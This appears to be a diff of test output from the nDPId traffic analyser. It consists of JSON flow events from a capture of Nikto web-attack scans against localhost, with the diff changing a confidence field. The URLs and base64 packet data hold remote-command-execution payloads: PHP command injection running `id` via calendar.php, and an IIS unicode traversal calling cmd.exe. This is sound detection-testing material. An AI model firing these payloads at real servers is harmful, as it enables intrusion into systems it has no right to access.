+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277858,"pkt":"AAAAAAAAAAAAAAAACABFAAEqtcxAAEAGhf9\/AAABfwAAAcc+H5DIWozz4BLqQYAYAED\/HgAAAQEICp1m\/4qdZv+KR0VUIC9ib2FyZC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277860,"pkt":"AAAAAAAAAAAAAAAACABFAAEumzdAAEAGoJB\/AAABfwAAAcdAH5B97qINvJ0VaoAYAED\/IgAAAQEICp1m\/4ydZv+MR0VUIC9jb21tdW5pdHkvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":309,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":309,"pkt_l4_len":275,"thread_ts_msec":1576420277861,"pkt":"AAAAAAAAAAAAAAAACABFAAEntyFAAEAGhK1\/AAABfwAAAcdCH5DLAI4n0VAE+IAYAED\/GwAAAQEICp1m\/42dZv+NR0VUIC92Yi9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} +01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277863,"pkt":"AAAAAAAAAAAAAAAACABFAAEuCCBAAEAGM6h\/AAABfwAAAcdEH5ADaDEo9nQ1BIAYAED\/IgAAAQEICp1m\/4+dZv+PR0VUIC92YnVsbGV0aW4vY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277864,"pkt":"AAAAAAAAAAAAAAAACABFAADJt5hAAEAGhJR\/AAABfwAAAcdGH5CwLY6th0R7wIAYAED+vQAAAQEICp1m\/5CdZv+QR0VUIC9fdnRpX2Jpbi9mcGNvdW50LmV4ZSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDg5KQ0KDQo="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277866,"pkt":"AAAAAAAAAAAAAAAACABFAADHtYVAAEAGhql\/AAABfwAAAcdIH5CyuYy6IN3YVoAYAED+uwAAAQEICp1m\/5KdZv+SR0VUIC9zaXRlL2VnL3NvdXJjZS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxMjYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277867,"pkt":"AAAAAAAAAAAAAAAACABFAADlWiBAAEAG4fB\/AAABfwAAAcdKH5CvgWMmQVkzqIAYAED+2QAAAQEICp1m\/5OdZv+TR0VUIC9jZXJ0c3J2Ly4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}} +01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 